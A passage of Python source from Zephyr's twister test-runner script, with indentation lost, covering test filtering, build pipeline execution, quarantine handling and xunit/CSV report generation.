'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads the quarantine list from the given yaml file. Creates a dictionary
of all test configurations (platform + scenario: comment) that shall be
skipped due to quarantine.
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = [p.name for p in self.platforms]
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
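# Illustrative note (not part of the original file): the platform x scenario product
# that load_quarantine() flattens into self.quarantine, shown for one made-up entry.
#     {"platforms": ["qemu_x86", "qemu_cortex_m3"], "scenarios": ["kernel.common"],
#      "comment": "flaky, see tracking issue"}
# expands to:
#     {"qemu_x86.kernel.common": "flaky, see tracking issue",
#      "qemu_cortex_m3.kernel.common": "flaky, see tracking issue"}
# A "platforms" list of ["all"] is replaced by every known platform name first.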
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
# TODO: add quarantine relief here when PR with quarantine feature gets merged
if self.integration and instance.platform.name in instance.testcase.integration_platforms:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
# If the instance got 'error' status before, proceed to the report stage
if instance.status == "error":
pipeline.put({"op": "report", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' elements can be added to 'properties',
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' elements can be added to 'properties',
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
